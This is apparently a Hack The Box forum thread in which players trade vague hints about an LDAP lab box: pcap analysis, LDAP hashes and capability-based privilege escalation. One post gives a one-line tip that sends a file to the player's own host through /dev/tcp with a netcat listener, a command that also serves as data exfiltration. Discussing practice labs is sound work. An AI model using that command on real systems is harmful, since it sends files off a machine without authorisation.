Hi guys and girls!
this is my first try on a HTB-box and I really can’t get very far. All I have is a the ssh connectioj to my user account and a few dump-files from wireshark, where i cannot find any useful info yet… getting a little frustrated.
The hints with “capabilities” etc. didn’t helkp me much.
I would very much appreciate any help from you people. Please PM me, if you would like to help a noob out.
I found two binaries in the dir. And found there is something related to capability
And followed that medium article
But still I am getting permission denied in reading files, even after applying the steps of that article properly.
Any help? Please DM
Thanks
Stuck at the root stage.
Found user.txt.
Found files in /home/ldapuser1 but don’t know how to leverage them to gain root.
Tried to search for certificates and keys to decrypt trafic in pcap but no luck.
Any help would be appreciated.
I have low privilege shell(using my ip) and two ldap hashes. Cracking it isn’t working. What am I missing? Can someone give a nudge?
EDIT:Got something from tcp****, but unable to modify l*** using this.
Ok, this was a strange box. I owned it in 2.5 hours but started to read hints in forum too early! There is more than enough written in this thread. Do not read it if you want to have more fun. This tips will be enough:
Man i am just lost on this one. Can’t figure out what is needed to trigger the ldap bind request i am trying to capture. If anyone can shoot me a PM on the initial user part, it would be much appreciated.
Got User, working on root, I’ve done the whole cap privesc on a different box, cant remember which one atm. So I should pop this bad boy before I head to bed tonight. But before I finish and write my review I want to share a quick tip for anyone doing this box who is having trouble transfering files
cat FILE >& /dev/tcp/YOUR-IP/PORT
should do the trick, just dont forget to setup a netcat listener on your kali box that pipes out to a file.
Thanks for the tip! I went through the process of base64 encoding it and which was a pain.
Rooted!
I’m really interested how everyone else did it. Anyone fancy having a conversation on how they did it? would like to know other ways, maybe how to get shell too!